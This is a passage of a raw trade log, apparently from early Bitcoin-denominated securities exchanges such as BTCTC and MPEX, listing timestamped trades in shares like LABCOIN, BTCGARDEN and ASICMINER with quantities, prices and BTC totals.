11:54:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.04009 = 0.1604 BTC [-] Aug 01 11:54:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.04002 = 0.1201 BTC [-] Aug 01 11:55:14 [BTCTC] [LABCOIN] 499 @ 0.002525 = 1.26 BTC [+] Aug 01 11:55:22 [BTCTC] [BTCGARDEN] 10000 @ 0.016 = 160 BTC [+] Aug 01 11:55:28 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 01 11:55:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.04002 = 0.1601 BTC [-] Aug 01 11:56:03 [BTCTC] [BTCGARDEN] 10000 @ 0.016 = 160 BTC [+] Aug 01 11:56:48 [BTCTC] [LABCOIN] 1500 @ 0.002499 = 3.7485 BTC [-] Aug 01 11:57:54 [BTCTC] [LABCOIN] 2100 @ 0.002499 = 5.2479 BTC [-] Aug 01 11:59:24 [BTCTC] [LABCOIN] 150 @ 0.002404 = 0.3606 BTC [-] Aug 01 11:59:25 [BTCTC] [LABCOIN] 1000 @ 0.002399 = 2.399 BTC [-] Aug 01 11:59:27 [BTCTC] [LABCOIN] 150 @ 0.002399 = 0.3599 BTC [-] Aug 01 11:59:29 [BTCTC] [LABCOIN] 30 @ 0.002805 = 0.0842 BTC [+] Aug 01 11:59:31 [BTCTC] [LABCOIN] 20 @ 0.00281 = 0.0562 BTC [+] Aug 01 12:01:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.04003 BTC [+] Aug 01 12:01:35 [BTCTC] [LABCOIN] 1 @ 0.002804 BTC [-] Aug 01 12:02:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04003 BTC [+] Aug 01 12:02:28 [BTCTC] [BTCGARDEN] 9000 @ 0.016 = 144 BTC [+] Aug 01 12:02:42 [BTCTC] [BTCGARDEN] 323 @ 0.016 = 5.168 BTC [+] Aug 01 12:03:00 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 01 12:03:03 [BTCTC] [BTCGARDEN] 35 @ 0.016 = 0.56 BTC [+] Aug 01 12:03:05 [BTCTC] [BTCGARDEN] 5920 @ 0.016 = 94.72 BTC [+] Aug 01 12:03:14 [BTCTC] [BTCGARDEN] 280 @ 0.016 = 4.48 BTC [+] Aug 01 12:03:17 [BTCTC] [BTCGARDEN] 625 @ 0.016 = 10 BTC [+] Aug 01 12:03:29 [BTCTC] [BTCGARDEN] 9500 @ 0.016 = 152 BTC [+] Aug 01 12:03:43 [BTCTC] [ASICMINER-PT] 1 @ 4.042 BTC [+] Aug 01 12:05:23 [BTCTC] [LABCOIN] 2 @ 0.002777 = 0.0056 BTC [-] Aug 01 12:07:05 [BTCTC] [ACTIVEMINING] 10 @ 0.005938 = 0.0594 BTC [-] Aug 01 12:07:23 [MPEX] [S.MPOE] 951 @ 0.00080913 = 0.7695 BTC [+] Aug 01 12:08:41 [BTCTC] [LABCOIN] 1 @ 0.002773 BTC [-] Aug 01 12:09:04 [BTCTC] [ACTIVEMINING] 40 @ 0.005938 = 0.2375 BTC [-] Aug 01 12:09:05 [BTCTC] [ACTIVEMINING] 210 @ 0.005923 = 1.2438 BTC [-] Aug 01 12:10:23 [BTCTC] [LABCOIN] 535 @ 0.002771 = 1.4825 BTC [-] Aug 01 12:12:34 [BTCTC] [LABCOIN] 220 @ 0.002501 = 0.5502 BTC [-] Aug 01 12:13:29 [BTCTC] [LABCOIN] 50 @ 0.002503 = 0.1252 BTC [+] Aug 01 12:13:31 [BTCTC] [LABCOIN] 80 @ 0.002501 = 0.2001 BTC [-] Aug 01 12:13:32 [BTCTC] [LABCOIN] 15 @ 0.0025 = 0.0375 BTC [-] Aug 01 12:13:34 [BTCTC] [LABCOIN] 300 @ 0.0025 = 0.75 BTC [-] Aug 01 12:13:35 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 12:13:48 [BTCTC] [BTCGARDEN] 190 @ 0.016 = 3.04 BTC [+] Aug 01 12:14:03 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 12:14:08 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 01 12:16:16 [BTCTC] [ASICMINER-PT] 2 @ 4.039 = 8.078 BTC [-] Aug 01 12:17:56 [BTCTC] [ASICMINER-PT] 3 @ 4.04 = 12.12 BTC [+] Aug 01 12:19:58 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 01 12:20:33 [BTCTC] [BTCGARDEN] 596 @ 0.016 = 9.536 BTC [+] Aug 01 12:22:09 [BTCTC] [LABCOIN] 255 @ 0.00255 = 0.6503 BTC [+] Aug 01 12:22:28 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 12:27:02 [BTCTC] [CRYPTO-TRADE] 47 @ 0.199 = 9.353 BTC [-] Aug 01 12:27:38 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Aug 01 12:28:08 [BTCTC] [ACTIVEMINING] 50 @ 0.005926 = 0.2963 BTC [+] Aug 01 12:28:09 [BTCTC] [ACTIVEMINING] 525 @ 0.005925 = 3.1106 BTC [-] Aug 01 12:28:11 [BTCTC] [ACTIVEMINING] 350 @ 0.005922 = 2.0727 BTC [-] Aug 01 12:28:23 [BTCTC] [LABCOIN] 3 @ 0.002587 = 0.0078 BTC [+] Aug 01 12:29:03 [BTCTC] [BTCGARDEN] 249 @ 0.016 = 3.984 BTC [+] Aug 01 12:30:04 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Aug 01 12:30:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.04179 = 0.4179 BTC [+] Aug 01 12:33:05 [BTCTC] [TAT.MINIGAME] 40 @ 0.0002987 = 0.0119 BTC [+] Aug 01 12:33:22 [BTCTC] [LABCOIN] 5 @ 0.002469 = 0.0123 BTC [-] Aug 01 12:33:24 [BTCTC] [LABCOIN] 11 @ 0.00247 = 0.0272 BTC [+] Aug 01 12:33:25 [BTCTC] [LABCOIN] 668 @ 0.00247 = 1.65 BTC [+] Aug 01 12:33:55 [BTCTC] [ACTIVEMINING] 31 @ 0.005924 = 0.1836 BTC [+] Aug 01 12:33:57 [BTCTC] [ACTIVEMINING] 325 @ 0.005923 = 1.925 BTC [-] Aug 01 12:33:58 [BTCTC] [ACTIVEMINING] 650 @ 0.005922 = 3.8493 BTC [-] Aug 01 12:34:00 [BTCTC] [ACTIVEMINING] 100 @ 0.00591 = 0.591 BTC [-] Aug 01 12:34:01 [BTCTC] [ACTIVEMINING] 243 @ 0.0059 = 1.4337 BTC [-] Aug 01 12:34:10 [BTCTC] [LABCOIN] 800 @ 0.00247 = 1.976 BTC [+] Aug 01 12:35:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.04178 = 0.1253 BTC [-] Aug 01 12:35:49 [BTCTC] [TAT.ASICMINER] 32 @ 0.04005 = 1.2816 BTC [-] Aug 01 12:35:51 [BTCTC] [TAT.ASICMINER] 38 @ 0.04005 = 1.5219 BTC [-] Aug 01 12:36:30 [BTCTC] [LABCOIN] 2 @ 0.00248 = 0.005 BTC [+] Aug 01 12:36:31 [BTCTC] [LABCOIN] 516 @ 0.00247 = 1.2745 BTC [-] Aug 01 12:36:33 [BTCTC] [LABCOIN] 10 @ 0.002451 = 0.0245 BTC [-] Aug 01 12:36:34 [BTCTC] [LABCOIN] 1000 @ 0.00245 = 2.45 BTC [-] Aug 01 12:36:35 [BTCTC] [LABCOIN] 1060 @ 0.0024 = 2.544 BTC [-] Aug 01 12:38:06 [BTCTC] [TAT.MINIGAME] 6 @ 0.0002987 = 0.0018 BTC [+] Aug 01 12:41:39 [BTCTC] [TAT.ASICMINER] 15 @ 0.04177 = 0.6266 BTC [+] Aug 01 12:41:42 [BTCTC] [BITVPS] 1 @ 0.0015 BTC [-] Aug 01 12:41:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.04177 = 2.0885 BTC [+] Aug 01 12:41:43 [BTCTC] [BITVPS] 50 @ 0.001402 = 0.0701 BTC [-] Aug 01 12:41:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.04178 BTC [+] Aug 01 12:41:46 [BTCTC] [BITVPS] 50 @ 0.0014 = 0.07 BTC [-] Aug 01 12:41:47 [BTCTC] [BITVPS] 1 @ 0.0014 BTC [-] Aug 01 12:41:49 [BTCTC] [BITVPS] 1 @ 0.001382 BTC [-] Aug 01 12:42:32 [BTCTC] [LABCOIN] 10 @ 0.002401 = 0.024 BTC [+] Aug 01 12:42:33 [BTCTC] [LABCOIN] 1 @ 0.002401 BTC [+] Aug 01 12:42:35 [BTCTC] [LABCOIN] 3940 @ 0.0024 = 9.456 BTC [-] Aug 01 12:42:36 [BTCTC] [LABCOIN] 50 @ 0.00235 = 0.1175 BTC [-] Aug 01 12:42:37 [BTCTC] [LABCOIN] 60 @ 0.002309 = 0.1385 BTC [-] Aug 01 12:42:37 [BTCTC] [LABCOIN] 20 @ 0.002277 = 0.0455 BTC [-] Aug 01 12:42:39 [BTCTC] [LABCOIN] 20 @ 0.002277 = 0.0455 BTC [-] Aug 01 12:42:40 [BTCTC] [LABCOIN] 899 @ 0.002272 = 2.0425 BTC [-] Aug 01 12:43:28 [BTCTC] [LABCOIN] 1 @ 0.002272 BTC [-] Aug 01 12:43:30 [BTCTC] [LABCOIN] 1762 @ 0.002271 = 4.0015 BTC [-] Aug 01 12:43:31 [BTCTC] [LABCOIN] 1335 @ 0.00227 = 3.0305 BTC [-] Aug 01 12:43:44 [BTCTC] [ASICMINER-PT] 2 @ 4.04 = 8.08 BTC [+] Aug 01 12:43:45 [BTCTC] [ACTIVEMINING] 50 @ 0.006076 = 0.3038 BTC [+] Aug 01 12:43:47 [BTCTC] [ACTIVEMINING] 25 @ 0.006077 = 0.1519 BTC [+] Aug 01 12:43:48 [BTCTC] [ACTIVEMINING] 103 @ 0.006099 = 0.6282 BTC [+] Aug 01 12:43:49 [BTCTC] [ACTIVEMINING] 100 @ 0.006099 = 0.6099 BTC [+] Aug 01 12:43:50 [BTCTC] [ACTIVEMINING] 206 @ 0.0061 = 1.2566 BTC [+] Aug 01 12:45:51 [BTCTC] [TAT.ASICMINER] 14 @ 0.04178 = 0.5849 BTC [+] Aug 01 12:46:15 [BTCTC] [TAT.ASICMINER] 40 @ 0.04101 = 1.6404 BTC [-] Aug 01 12:46:17 [BTCTC] [ACTIVEMINING] 1 @ 0.00612 BTC [+] Aug 01 12:46:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04101 BTC [-] Aug 01 12:46:20 [BTCTC] [ACTIVEMINING] 6 @ 0.0061 = 0.0366 BTC [-] Aug 01 12:46:21 [BTCTC] [ACTIVEMINING] 493 @ 0.0059 = 2.9087 BTC [-] Aug 01 12:47:20 [BTCTC] [TAT.MINIGAME] 2553 @ 0.0002644 = 0.675 BTC [-] Aug 01 12:47:42 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [+] Aug 01 12:48:54 [BTCTC] [LABCOIN] 9 @ 0.002309 = 0.0208 BTC [+] Aug 01 12:48:56 [BTCTC] [TAT.MINIGAME] 2553 @ 0.0002644 = 0.675 BTC [-] Aug 01 12:48:56 [BTCTC] [LABCOIN] 18 @ 0.00231 = 0.0416 BTC [+] Aug 01 12:48:57 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002643 = 0.0264 BTC [-] Aug 01 12:48:58 [BTCTC] [LABCOIN] 23 @ 0.002369 = 0.0545 BTC [+] Aug 01 12:48:59 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002621 = 0.0262 BTC [-] Aug 01 12:49:01 [BTCTC] [TAT.MINIGAME] 300 @ 0.000262 = 0.0786 BTC [-] Aug 01 12:49:02 [BTCTC] [TAT.MINIGAME] 1 @ 0.000261 BTC [-] Aug 01 12:49:03 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002603 BTC [-] Aug 01 12:49:04 [BTCTC] [TAT.MINIGAME] 4852 @ 0.00026 = 1.2615 BTC [-] Aug 01 12:49:21 [BTCTC] [LABCOIN] 12 @ 0.002369 = 0.0284 BTC [+] Aug 01 12:49:35 [BTCTC] [LABCOIN] 9 @ 0.002309 = 0.0208 BTC [-] Aug 01 12:49:36 [BTCTC] [LABCOIN] 20 @ 0.002272 = 0.0454 BTC [-] Aug 01 12:49:37 [BTCTC] [LABCOIN] 20 @ 0.002271 = 0.0454 BTC [-] Aug 01 12:49:39 [BTCTC] [LABCOIN] 2000 @ 0.002271 = 4.542 BTC [-] Aug 01 12:49:40 [BTCTC] [LABCOIN] 1665 @ 0.00227 = 3.7796 BTC [-] Aug 01 12:49:41 [BTCTC] [LABCOIN] 1800 @ 0.002261 = 4.0698 BTC [-] Aug 01 12:49:42 [BTCTC] [LABCOIN] 2000 @ 0.00226 = 4.52 BTC [-] Aug 01 12:49:44 [BTCTC] [LABCOIN] 1000 @ 0.00226 = 2.26 BTC [-] Aug 01 12:49:45 [BTCTC] [LABCOIN] 1000 @ 0.00226 = 2.26 BTC [-] Aug 01 12:49:46 [BTCTC] [LABCOIN] 2000 @ 0.002257 = 4.514 BTC [-] Aug 01 12:49:47 [BTCTC] [LABCOIN] 400 @ 0.002256 = 0.9024 BTC [-] Aug 01 12:49:48 [BTCTC] [LABCOIN] 5875 @ 0.002256 = 13.254 BTC [-] Aug 01 12:49:48 [BTCTC] [LABCOIN] 852 @ 0.002255 = 1.9213 BTC [-] Aug 01 12:50:17 [BTCTC] [ACTIVEMINING] 22 @ 0.00615 = 0.1353 BTC [+] Aug 01 12:50:33 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 01 12:50:46 [BTCTC] [BTCGARDEN] 208 @ 0.016 = 3.328 BTC [+] Aug 01 12:50:58 [BTCTC] [LABCOIN] 70 @ 0.00237 = 0.1659 BTC [+] Aug 01 12:51:08 [BTCTC] [BTCGARDEN] 3150 @ 0.016 = 50.4 BTC [+] Aug 01 12:51:11 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 12:51:36 [BTCTC] [LABCOIN] 3 @ 0.002429 = 0.0073 BTC [+] Aug 01 12:51:38 [BTCTC] [LABCOIN] 7 @ 0.00243 = 0.017 BTC [+] Aug 01 12:51:39 [BTCTC] [LABCOIN] 12 @ 0.002509 = 0.0301 BTC [+] Aug 01 12:51:40 [BTCTC] [LABCOIN] 25 @ 0.00251 = 0.0628 BTC [+] Aug 01 12:51:40 [BTCTC] [LABCOIN] 253 @ 0.002599 = 0.6575 BTC [+] Aug 01 12:54:48 [BTCTC] [LABCOIN] 20 @ 0.002596 = 0.0519 BTC [-] Aug 01 12:56:54 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 12:57:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04177 BTC [+] Aug 01 12:58:20 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 01 12:58:39 [MPEX] [S.MPOE] 18250 @ 0.00081163 = 14.8122 BTC [+] Aug 01 12:58:42 [BTCTC] [BASIC-MINING] 1 @ 0.4414 BTC [-] Aug 01 13:00:52 [BTCTC] [ACTIVEMINING] 1 @ 0.00611 BTC [-] Aug 01 13:00:54 [BTCTC] [ACTIVEMINING] 1 @ 0.006 BTC [-] Aug 01 13:01:41 [MPEX] [S.MPOE] 10500 @ 0.00081223 = 8.5284 BTC [+] Aug 01 13:01:43 [MPEX] [S.MPOE] 5150 @ 0.00081287 = 4.1863 BTC [+] Aug 01 13:02:56 [BTCTC] [ACTIVEMINING] 14 @ 0.006149 = 0.0861 BTC [+] Aug 01 13:02:56 [BTCTC] [ACTIVEMINING] 28 @ 0.00615 = 0.1722 BTC [+] Aug 01 13:04:07 [BTCTC] [LABCOIN] 13 @ 0.002509 = 0.0326 BTC [-] Aug 01 13:04:21 [BTCTC] [ACTIVEMINING] 33 @ 0.006183 = 0.204 BTC [+] Aug 01 13:05:15 [BTCTC] [LABCOIN] 1000 @ 0.00251 = 2.51 BTC [+] Aug 01 13:05:17 [BTCTC] [LABCOIN] 183 @ 0.002596 = 0.4751 BTC [+] Aug 01 13:05:18 [BTCTC] [LABCOIN] 1000 @ 0.002597 = 2.597 BTC [+] Aug 01 13:05:19 [BTCTC] [LABCOIN] 5 @ 0.002598 = 0.013 BTC [+] Aug 01 13:05:21 [BTCTC] [LABCOIN] 900 @ 0.002598 = 2.3382 BTC [+] Aug 01 13:05:22 [BTCTC] [LABCOIN] 1000 @ 0.0026 = 2.6 BTC [+] Aug 01 13:05:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.04176 BTC [-] Aug 01 13:05:51 [BTCTC] [LABCOIN] 43 @ 0.0026 = 0.1118 BTC [+] Aug 01 13:06:36 [BTCTC] [ASICMINER-PT] 1 @ 3.99 BTC [-] Aug 01 13:06:38 [BTCTC] [ASICMINER-PT] 4 @ 3.989 = 15.956 BTC [-] Aug 01 13:06:39 [BTCTC] [ASICMINER-PT] 3 @ 3.988 = 11.964 BTC [-] Aug 01 13:06:41 [BTCTC] [ASICMINER-PT] 2 @ 3.987 = 7.974 BTC [-] Aug 01 13:06:42 [BTCTC] [ASICMINER-PT] 1 @ 3.985 BTC [-] Aug 01 13:07:11 [BTCTC] [LABCOIN] 230 @ 0.00255 = 0.5865 BTC [-] Aug 01 13:08:25 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 01 13:08:28 [BTCTC] [BTCGARDEN] 2700 @ 0.016 = 43.2 BTC [+] Aug 01 13:08:50 [BTCTC] [LABCOIN] 27 @ 0.002511 = 0.0678 BTC [-] Aug 01 13:09:31 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 01 13:09:44 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 13:10:31 [BTCTC] [LABCOIN] 1 @ 0.00263 BTC [+] Aug 01 13:10:41 [BTCTC] [LABCOIN] 1993 @ 0.002511 = 5.0044 BTC [-] Aug 01 13:11:08 [BTCTC] [LABCOIN] 205 @ 0.002511 = 0.5148 BTC [-] Aug 01 13:12:49 [BTCTC] [LABCOIN] 799 @ 0.00263 = 2.1014 BTC [+] Aug 01 13:14:35 [BTCTC] [ACTIVEMINING] 68 @ 0.006181 = 0.4203 BTC [-] Aug 01 13:14:56 [BTCTC] [LABCOIN] 201 @ 0.00263 = 0.5286 BTC [+] Aug 01 13:15:18 [BTCTC] [ACTIVEMINING] 1 @ 0.006181 BTC [-] Aug 01 13:15:58 [BTCTC] [ACTIVEMINING] 340 @ 0.006101 = 2.0743 BTC [-] Aug 01 13:16:57 [MPEX] [S.MPOE] 2150 @ 0.00081287 = 1.7477 BTC [+] Aug 01 13:16:59 [MPEX] [S.MPOE] 2701 @ 0.00081339 = 2.197 BTC [+] Aug 01 13:18:30 [BTCTC] [LABCOIN] 795 @ 0.00255 = 2.0273 BTC [-] Aug 01 13:18:30 [BTCTC] [LABCOIN] 874 @ 0.002512 = 2.1955 BTC [-] Aug 01 13:18:32 [BTCTC] [LABCOIN] 643 @ 0.00251 = 1.6139 BTC [-] Aug 01 13:20:25 [BTCTC] [LABCOIN] 1000 @ 0.00251 = 2.51 BTC [-] Aug 01 13:20:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.04175 = 0.1253 BTC [-] Aug 01 13:20:35 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 01 13:21:05 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 13:21:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04011 BTC [-] Aug 01 13:21:11 [BTCTC] [TAT.ASICMINER] 36 @ 0.04011 = 1.444 BTC [-] Aug 01 13:22:47 [BTCTC] [LABCOIN] 2 @ 0.002635 = 0.0053 BTC [+] Aug 01 13:26:29 [MPEX] [S.MPOE] 12949 @ 0.00081339 = 10.5326 BTC [+] Aug 01 13:26:44 [BTCTC] [ASICMINER-PT] 1 @ 4.012 BTC [+] Aug 01 13:27:02 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 13:27:03 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 13:27:13 [BTCTC] [LABCOIN] 500 @ 0.002635 = 1.3175 BTC [+] Aug 01 13:27:46 [HAVELOCK] [AM1] 1 @ 4.07464553 BTC [-] Aug 01 13:28:45 [BTCTC] [LABCOIN] 500 @ 0.002636 = 1.318 BTC [+] Aug 01 13:28:58 [BTCTC] [ASICMINER-PT] 1 @ 3.989 BTC [-] Aug 01 13:29:00 [BTCTC] [ASICMINER-PT] 4 @ 3.989 = 15.956 BTC [-] Aug 01 13:31:20 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 13:31:25 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 13:31:26 [BTCTC] [LABCOIN] 387 @ 0.00251 = 0.9714 BTC [-] Aug 01 13:31:37 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 13:31:49 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 01 13:31:57 [BTCTC] [BTCGARDEN] 231 @ 0.016 = 3.696 BTC [+] Aug 01 13:32:00 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 13:32:18 [BTCTC] [BTCGARDEN] 2067 @ 0.016 = 33.072 BTC [+] Aug 01 13:32:30 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 01 13:34:02 [BTCTC] [TAT.MINIGAME] 1 @ 0.000288 BTC [+] Aug 01 13:34:14 [BTCTC] [TAT.MINIGAME] 10 @ 0.000288 = 0.0029 BTC [+] Aug 01 13:35:42 [BTCTC] [BASIC-MINING] 1 @ 0.422 BTC [-] Aug 01 13:35:46 [BTCTC] [LABCOIN] 9148 @ 0.002255 = 20.6287 BTC [-] Aug 01 13:35:48 [BTCTC] [LABCOIN] 2685 @ 0.00225 = 6.0413 BTC [-] Aug 01 13:35:50 [BTCTC] [LABCOIN] 450 @ 0.00225 = 1.0125 BTC [-] Aug 01 13:35:53 [BTCTC] [LABCOIN] 11 @ 0.00225 = 0.0248 BTC [-] Aug 01 13:36:38 [BTCTC] [COGNITIVE] 10 @ 0.7 = 7 BTC [+] Aug 01 13:36:42 [MPEX] [S.MPOE] 1521 @ 0.00081208 = 1.2352 BTC [-] Aug 01 13:36:44 [MPEX] [S.MPOE] 5330 @ 0.00081069 = 4.321 BTC [-] Aug 01 13:36:51 [BTCTC] [LABCOIN] 200 @ 0.00226 = 0.452 BTC [+] Aug 01 13:37:03 [BTCTC] [LABCOIN] 187 @ 0.00226 = 0.4226 BTC [+] Aug 01 13:37:07 [BTCTC] [LABCOIN] 163 @ 0.00226 = 0.3684 BTC [+] Aug 01 13:37:08 [BTCTC] [LABCOIN] 5 @ 0.00224 = 0.0112 BTC [-] Aug 01 13:37:10 [BTCTC] [LABCOIN] 200 @ 0.002202 = 0.4404 BTC [-] Aug 01 13:37:11 [BTCTC] [LABCOIN] 1000 @ 0.0022 = 2.2 BTC [-] Aug 01 13:37:12 [BTCTC] [LABCOIN] 1000 @ 0.0022 = 2.2 BTC [-] Aug 01 13:37:13 [BTCTC] [LABCOIN] 100 @ 0.0022 = 0.22 BTC [-] Aug 01 13:37:14 [BTCTC] [LABCOIN] 30 @ 0.002106 = 0.0632 BTC [-] Aug 01 13:37:15 [BTCTC] [LABCOIN] 40 @ 0.002106 = 0.0842 BTC [-] Aug 01 13:37:16 [BTCTC] [LABCOIN] 1798 @ 0.002105 = 3.7848 BTC [-] Aug 01 13:37:17 [BTCTC] [LABCOIN] 1240 @ 0.002097 = 2.6003 BTC [-] Aug 01 13:37:18 [BTCTC] [LABCOIN] 250 @ 0.002097 = 0.5243 BTC [-] Aug 01 13:37:19 [BTCTC] [LABCOIN] 25 @ 0.002015 = 0.0504 BTC [-] Aug 01 13:37:21 [BTCTC] [LABCOIN] 149 @ 0.00201 = 0.2995 BTC [-] Aug 01 13:37:22 [BTCTC] [LABCOIN] 4000 @ 0.002499 = 9.996 BTC [+] Aug 01 13:37:58 [BTCTC] [LABCOIN] 592 @ 0.002498 = 1.4788 BTC [-] Aug 01 13:38:31 [BTCTC] [LABCOIN] 4408 @ 0.002498 = 11.0112 BTC [-] Aug 01 13:38:39 [BTCTC] [ACTIVEMINING] 631 @ 0.006183 = 3.9015 BTC [+] Aug 01 13:38:40 [BTCTC] [ACTIVEMINING] 119 @ 0.006184 = 0.7359 BTC [+] Aug 01 13:40:44 [BTCTC] [LABCOIN] 1000 @ 0.002205 = 2.205 BTC [-] Aug 01 13:40:46 [BTCTC] [LABCOIN] 74 @ 0.002204 = 0.1631 BTC [-] Aug 01 13:42:26 [BTCTC] [ACTIVEMINING] 80 @ 0.006182 = 0.4946 BTC [-] Aug 01 13:43:30 [BTCTC] [ACTIVEMINING] 4 @ 0.006105 = 0.0244 BTC [-] Aug 01 13:43:31 [BTCTC] [ACTIVEMINING] 1000 @ 0.006 = 6 BTC [-] Aug 01 13:44:11 [BTCTC] [ACTIVEMINING] 36 @ 0.006182 = 0.2226 BTC [+] Aug 01 13:44:34 [BTCTC] [DMS.SELLING] 18 @ 0.0228 = 0.4104 BTC [+] Aug 01 13:45:08 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [+] Aug 01 13:45:54 [BTCTC] [BFMINES] 2 @ 0.003997 = 0.008 BTC [-] Aug 01 13:47:22 [BTCTC] [LABCOIN] 50 @ 0.00239 = 0.1195 BTC [+] Aug 01 13:47:42 [BTCTC] [LABCOIN] 4000 @ 0.002215 = 8.86 BTC [-] Aug 01 13:47:44 [BTCTC] [LABCOIN] 84 @ 0.002211 = 0.1857 BTC [-] Aug 01 13:47:45 [BTCTC] [LABCOIN] 100 @ 0.002211 = 0.2211 BTC [-] Aug 01 13:47:47 [BTCTC] [LABCOIN] 1000 @ 0.002211 = 2.211 BTC [-] Aug 01 13:50:22 [BTCTC] [LABCOIN] 314 @ 0.002209 = 0.6936 BTC [-] Aug 01 13:50:26 [BTCTC] [LABCOIN] 628 @ 0.002209 = 1.3873 BTC [-] Aug 01 13:52:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.04014 = 0.4014 BTC [+] Aug 01 13:53:07 [BTCTC] [LABCOIN] 558 @ 0.002209 = 1.2326 BTC [-] Aug 01 13:53:11 [BTCTC] [LABCOIN] 708 @ 0.002208 = 1.5633 BTC [-] Aug 01 13:56:15 [BTCTC] [BTCGARDEN] 29 @ 0.016 = 0.464 BTC [+] Aug 01 13:56:18 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 13:56:21 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 13:56:29 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 13:56:56 [BTCTC] [BTCGARDEN] 99 @ 0.016 = 1.584 BTC [+] Aug 01 13:56:59 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 13:57:22 [BTCTC] [TAT.ASICMINER] 24 @ 0.04015 = 0.9636 BTC [+] Aug 01 13:57:23 [BTCTC] [LABCOIN] 2184 @ 0.002387 = 5.2132 BTC [+] Aug 01 13:57:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.04014 = 2.007 BTC [-] Aug 01 13:57:25 [BTCTC] [LABCOIN] 1816 @ 0.002388 = 4.3366 BTC [+] Aug 01 13:57:27 [BTCTC] [LABCOIN] 50 @ 0.00221 = 0.1105 BTC [-] Aug 01 13:57:28 [BTCTC] [TAT.ASICMINER] 61 @ 0.04005 = 2.4431 BTC [-] Aug 01 13:57:30 [BTCTC] [TAT.ASICMINER] 14 @ 0.04003 = 0.5604 BTC [-] Aug 01 13:57:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.04002 = 0.2001 BTC [-] Aug 01 13:57:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.04001 = 0.08 BTC [-] Aug 01 13:57:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.04001 BTC [-] Aug 01 13:57:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.04 = 0.24 BTC [-] Aug 01 13:57:36 [BTCTC] [TAT.ASICMINER] 12 @ 0.04 = 0.48 BTC [-] Aug 01 13:57:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 01 13:57:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Aug 01 13:59:15 [BTCTC] [LABCOIN] 100 @ 0.002388 = 0.2388 BTC [+] Aug 01 13:59:19 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [+] Aug 01 13:59:26 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 13:59:27 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 14:00:56 [BTCTC] [LABCOIN] 50 @ 0.002379 = 0.119 BTC [-] Aug 01 14:00:57 [BTCTC] [LABCOIN] 592 @ 0.00238 = 1.409 BTC [+] Aug 01 14:00:59 [BTCTC] [LABCOIN] 358 @ 0.002388 = 0.8549 BTC [+] Aug 01 14:01:30 [BTCTC] [LABCOIN] 2908 @ 0.002388 = 6.9443 BTC [+] Aug 01 14:02:30 [BTCTC] [ASICMINER-PT] 1 @ 4.079 BTC [+] Aug 01 14:02:45 [BTCTC] [LABCOIN] 16 @ 0.00239 = 0.0382 BTC [+] Aug 01 14:02:54 [BTCTC] 